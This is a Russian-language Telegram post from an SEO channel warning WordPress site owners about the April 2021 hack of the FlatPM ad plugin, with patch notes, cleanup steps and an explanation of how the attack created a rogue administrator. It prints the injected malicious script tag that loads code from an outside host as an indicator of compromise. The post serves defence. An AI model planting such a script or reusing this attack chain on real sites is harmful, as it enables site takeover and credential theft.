SEOFAQ Telegram, маркетинг и SEO Канал SEOFAQT в мессенджере Telegram

Все чаты⚡️⚡️⚡️Взлом Flat PM! Знаю, что многие вебмастера для вывода...


⚡️⚡️⚡️Взлом Flat PM!

Знаю, что многие вебмастера для вывода рекламы используют Flat PM. Так вот он был взломан! Цитата разработчика:

(13.04.21) произошла хакерская атака на сайты с установленным плагином FlatPM!Настоятельно просим обновить плагин до свежей версии!

Патч – v2.654

1. Закрыта дыра в коде, которая позволяла внедрять вредоносный код на ваш сайт.

2. Исправлена совместимость в WPRocket, с его функцией отложенных скриптов.

Итак! Если у вас на сайте был замечен код в разделе Header и footer:

<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>

Проверьте появился ли новый администратор с почтой: system@wordpress.local

___________________________________

Если это ваш случай, то я настоятельно рекомендую восстановить полный бекап сайта за вчерашний день (12.04.21) или ранее!

Если по какой-то причине вы этого не хотите делать или не можете, то удалите вредоносный код из раздела Header и footer, затем удалите нового пользователя из админки.

После этого обновите плагин до версии 2.654!Обязательно смените пароль! Почистите куки вашего браузера! Обязательно почистите кеш на вашем сайте, т.к. вредоносный скрипт может быть закеширован!

Попытаюсь объяснить как произошёл взлом:

Злоумышленник через admin-ajax.php воспользовался уязвимостью и внедрил код

<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>

в раздел header и footerЗатем вы или другой администратор сайта зашёл на сайт залогиненым.

В браузере сработал вредоносный код, который отправил запрос на /wp-admin/user-new.php на создание нового юзера, если это сделает любой другой человек – ничего не произойдёт, но если это сделает администратор, то новый пользователь будет создан!

Затем скрипт отправил логин и пароль атакующему.

Источник: https://mehanoid.pro/ostorozhno-kiber-ataka/

@vysokoffru

Источник новости https://t.me/vysokoffru/700...